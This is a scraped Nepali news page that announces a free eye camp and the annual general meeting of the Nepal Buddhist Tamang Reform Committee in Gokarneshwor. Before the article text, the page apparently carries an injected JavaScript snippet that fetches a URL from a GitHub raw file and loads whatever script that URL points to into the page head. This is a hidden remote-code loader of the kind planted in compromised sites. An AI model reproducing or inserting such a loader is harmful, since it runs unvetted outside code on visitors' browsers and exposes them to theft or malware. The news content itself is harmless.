;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); नेपाल बुद्धिष्ट तामाङ सुधार समितिले साधारणसभाको अवसरमा निशुल्क आँखा शिविर गर्ने – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • नेपाल बुद्धिष्ट तामाङ सुधार समितिले साधारणसभाको अवसरमा निशुल्क आँखा शिविर गर्ने
Breaking News

नेपाल बुद्धिष्ट तामाङ सुधार समितिले साधारणसभाको अवसरमा निशुल्क आँखा शिविर गर्ने

जुनेली न्युज, काठमाडौँ। नेपाल बुद्धिष् तामाङ सुधार समितिको २१ औं बार्षिक साधारणसभाको अवसरमा निशुल्क आँखा परीक्षण शिविर  कार्यक्रम गर्ने भएको छ। मिति २०७८ फाल्गुन १४ गते शनिबार संस्थाकै भवन गोकर्णेश्वर नगरपालिका वडा ४ मकालबारी हुने भएको छ। आँखा शिविर बिहान ८ बजे देखि हुने छ भने त्यस पश्चात १२ बजे संस्थाको साधारण सभा गरिने छ।

तिलगंगा आँखा अस्पतालको सहकार्यमा आँखाको उपचार, मोतिबिन्दुको उपचार साथै निशुल्क औषधि पनि वितरण गरिने छ। साथै संस्थाका संस्थापक कार्यसमिती  र पूर्व अध्यक्ष सँगै संस्था भित्र आबद्ध भएका +२ उतिर्ण विद्यार्थीहरुलाई समेत सम्मान गरिनेछ।

कार्यक्रममा प्रमुख अतिथि प्रदेशका हा सदस्य माननीय छिरिङ दोर्जे लामा र विशेष अतिथिमा गोकर्णेश्वर नगरपालिकाका मेयर सन्तोष चालिसे लगायतका व्यक्तिहरूको उपस्थिति हुने छ।

बिहान आँखा शिविर र रक्तदान सके पछि साधारणसभा गरिने र सो कार्यक्रमको लाभ उठाउन सुम्पर्ण नगरबासीलाई अनुरोध समेत समितिका अध्यक्ष रूप तामाङले बताउनु भयो।।

फेसबुक प्रतिक्रियाहरु